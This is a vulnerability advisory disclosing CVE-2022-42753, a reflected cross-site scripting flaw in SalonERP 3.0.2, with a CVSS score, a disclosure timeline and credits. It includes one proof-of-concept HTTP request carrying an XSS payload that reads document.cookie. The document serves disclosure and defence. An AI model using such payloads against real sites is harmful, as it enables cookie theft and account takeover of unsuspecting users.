SalonERP 3.0.2 - XSS to Account Takeover

Summary

NameSalonERP 3.0.2 - XSS to Account Takeover
Code nameHardway
ProductSalonERP
Affected versionsVersion 3.0.2
StatePublic
Release date2022-10-27

Vulnerability

KindReflected cross-site scripting (XSS)
Rule008. Reflected cross-site scripting (XSS)
RemoteYes
CVSSv3 VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CVSSv3 Base Score8.8
Exploit availableYes
CVE ID(s)CVE-2022-42753

Description

SalonERP version 3.0.2 allows an external attacker to steal the cookie of arbitrary users. This is possible because the application does not correctly validate the page parameter against XSS attacks.

Vulnerability

The XSS present in SalonERP 3.0.2, allows an unauthenticated remote attacker to perform an Account Takeover. To trigger this vulnerability, we will need to send the following malicious link to an victim in order to hack their account:

POST /try/backend.php HTTP/2
Host: salonerp.sourceforge.io
Cookie: salonerp-id=EnznqgZ8cAX2N7stbSLl; PHPSESSID=2f8c90c0e918726eed019427af65f438
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Origin: https://hacker.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 61

what=settings<img+src=1+onerror="(alert)(document.cookie)" />

Exploitation

In this attack we will obtain the victim user account, through a malicious link.

xss-to-accounttakeover-salonerp

Our security policy

We have reserved the CVE-2022-42753 to refer to these issues from now on.

System Information

  • Version: SalonERP 3.0.2

  • Operating System: GNU/Linux

Mitigation

There is currently no patch available for this vulnerability.

Credits

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

References

Vendor page https://salonerp.sourceforge.io/

Timeline

Time-lapse-logo

2022-10-13

Vulnerability discovered.

Time-lapse-logo

2022-10-13

Vendor contacted.

Time-lapse-logo

2022-10-13

Vendor replied acknowledging the report.

Time-lapse-logo

2022-10-27

Public Disclosure.